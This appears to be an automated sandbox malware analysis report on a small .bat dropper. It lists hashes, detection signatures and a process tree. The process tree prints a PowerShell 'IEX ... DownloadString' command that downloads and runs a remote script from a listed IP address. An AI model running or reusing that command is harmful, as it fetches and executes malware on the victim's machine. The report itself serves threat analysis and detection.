Analysis
-
max time kernel
81s -
max time network
93s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
03-08-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
2b4587aed40db6e44cbff092b52b841e.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2b4587aed40db6e44cbff092b52b841e.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
2b4587aed40db6e44cbff092b52b841e.bat
-
Size
218B
-
MD5
c69dabb8c2f1ca155fb5fe3b0482d0a7
-
SHA1
b3faaf0bd82fe27b076ec814b2123cf962ead51b
-
SHA256
99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
-
SHA512
c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 668 3932 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 668 WerFault.exe Token: SeBackupPrivilege 668 WerFault.exe Token: SeDebugPrivilege 668 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe 668 WerFault.exe -
ServiceHost packer 6 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/3932-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3932-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3932-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3932-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3932-6-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3932-7-0x0000000000000000-mapping.dmp servicehost -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3060 wrote to memory of 3932 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 3932 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 3932 3060 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"2⤵PID:3932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:668